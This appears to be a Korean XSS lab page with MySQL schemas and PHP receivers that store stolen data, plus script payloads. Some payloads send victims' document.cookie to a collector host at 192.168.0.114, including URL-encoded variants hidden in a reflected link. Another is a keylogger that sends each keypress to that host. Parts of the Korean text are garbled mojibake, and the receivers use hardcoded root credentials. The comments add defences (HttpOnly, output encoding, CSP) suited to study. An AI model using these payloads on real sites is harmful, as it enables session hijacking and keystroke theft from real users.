# 세션값 받을 데이터 베이스 생성
# Lab schema: a dedicated database holding one table, filled by the
# receiver script further down this page (one row per recorded request).
CREATE DATABASE xss_attack;
USE xss_attack;

CREATE TABLE session_list (
    date    DATE,         # written with now(); a DATE column keeps the calendar day only
    ip      VARCHAR(15),  # client address; 15 characters fits dotted IPv4 only
    session VARCHAR(50)   # submitted value, at most 50 characters
);
# 세션값 리스트 생성
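<?php
// Lab receiver for the XSS exercise on this page: stores the `data` query
// parameter together with the client address in xss_attack.session_list.
//
// NOTE(review): the connection uses the root account with the password in
// source. Keep this on an isolated lab host only; anything longer-lived should
// use a dedicated account limited to INSERT on this one table.
$db_conn = new mysqli("127.0.0.1","root","apmsetup","xss_attack");

// `data` is fully controlled by whoever sends the request, so it is treated as
// untrusted. isset() avoids an undefined-index notice when it is absent.
$session = isset($_GET["data"]) ? $_GET["data"] : "";
$remote_ip = $_SERVER["REMOTE_ADDR"];

if(!$db_conn->connect_errno && !empty($session)){
    // Bound parameters instead of string interpolation: the original built the
    // INSERT from the raw GET value, which left this script open to SQL injection.
    $stmt = $db_conn->prepare("insert into session_list (date, ip, session) values(now(), ?, ?)");
    if($stmt){
        $stmt->bind_param("ss", $remote_ip, $session);
        $stmt->execute();
        $stmt->close();
    }
}
?>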
XSS ๊ณต๊ฒฉ ์ํ
# ip๋ถ๋ถ์ ์์ ์ ip ์
๋ ฅ
<!--
  Lab samples: each snippet reads document.cookie and sends it as the `data`
  parameter to session.php on the lab host (192.168.0.114).
  Defensive notes: a cookie set with the HttpOnly attribute is not exposed to
  document.cookie; HTML-encoding user-supplied values on output stops the
  markup from being interpreted; a Content-Security-Policy that disallows
  inline script and restricts img-src limits both execution and the outbound
  request.
-->
<!-- Variant 1: inline script that navigates the browser to session.php. -->
<script>location.href="http://192.168.0.114/session.php?data="+document.cookie</script>
<!-- Variant 2: link to xssboard/index.php carrying a script in `value`; the
     script requests session.php through an Image object instead of navigating.
     Presumably index.php?page=error echoes `value` without encoding; confirm
     against the board's source. -->
<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new Image().src="http://192.168.0.114/session.php?data="+document.cookie</script>>๋ฐ๋ก๊ฐ๊ธฐ<a>
<!-- Variants 3 and 4: the same Image-based script with the space, '=', ':',
     '?' and '+' characters URL-encoded, standalone and inside the link. -->
<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>
<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>>๋ฐ๋ก๊ฐ๊ธฐ<a>
key Logging
๋๋ฅด๋ key๋ค์ ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ก ๋ฐ์์จ๋ค
# keylogging
# One row per client address; the receiver script on this page appends to `data`.
CREATE TABLE key_logging (
    date DATE,         # set with now() on first insert; a DATE column keeps the calendar day only
    ip   VARCHAR(15),  # client address; 15 characters fits dotted IPv4 only
    data TEXT          # accumulated submitted values
);
# key logging 실행 구문
<?php
// Lab receiver for the key-logging exercise: appends the `data` query
// parameter to the key_logging row that belongs to the requesting address,
// creating that row on the first request.
//
// NOTE(review): root account and password are embedded in source; keep this
// on an isolated lab host only.
$db_conn=new mysqli("127.0.0.1", "root", "apmsetup", "xss_attack");
// `data` is request-controlled; real_escape_string() escapes it for use inside
// the quoted SQL literals below. Prepared statements with bound parameters
// would be the more robust choice.
$key = $db_conn->real_escape_string($_GET["data"]);
// REMOTE_ADDR is supplied by the web server, not by request headers or body.
$remote_ip = $_SERVER["REMOTE_ADDR"];
if(!empty($key)){
// Look up whether this address already has a row.
$query = " SELECT * FROM key_logging where ip='{$remote_ip}'";
$tmp = $db_conn->query($query);
// NOTE(review): query() returns false on failure and $tmp is not checked
// before ->num_rows is read.
$cnt = $tmp->num_rows;
if($cnt==0){
// First request from this address: create the row.
$query="INSERT INTO key_logging VALUES(now(),'{$remote_ip}','{$key}')";
}else{
// Later requests: append to the stored text.
$query = "UPDATE key_logging SET data=concat(data,'{$key}') WHERE ip='{$remote_ip}'";
}
// NOTE(review): the SELECT and the write are separate statements, so two
// concurrent first requests from one address can both take the INSERT branch.
$db_conn->query($query);
}
$db_conn -> close();
?>
<!--
  Lab sample: a keypress handler on the document that reports each key to
  keylogging.php on the lab host (192.168.0.114) by setting an Image src.
  Defensive notes: this only runs if the page lets injected markup execute.
  HTML-encoding user-supplied values on output prevents that, and a
  Content-Security-Policy that disallows inline script and restricts img-src
  blocks both the handler and the outbound request.
-->
<script>document.onkeypress=function(a){
// Shows the pressed key in a dialog (lab visualisation of what is captured).
alert(a.key);
// `key` is assigned without a declaration, so it becomes an implicit global.
key=encodeURI(a.key);
// Enter is recorded as the marker "(E)".
if(key=="Enter"){
key="(E)";
}
// Setting src triggers a GET request carrying the key in `data`.
new Image().src="http://192.168.0.114/keylogging.php?data="+key;
}
</script>
<!-- The same handler collapsed onto a single line. -->
<script>document.onkeypress=function(a){alert(a.key); key=encodeURI(a.key); if(key=="Enter"){key="(E)";}new Image().src="http://192.168.0.114/keylogging.php?data="+key;}</script>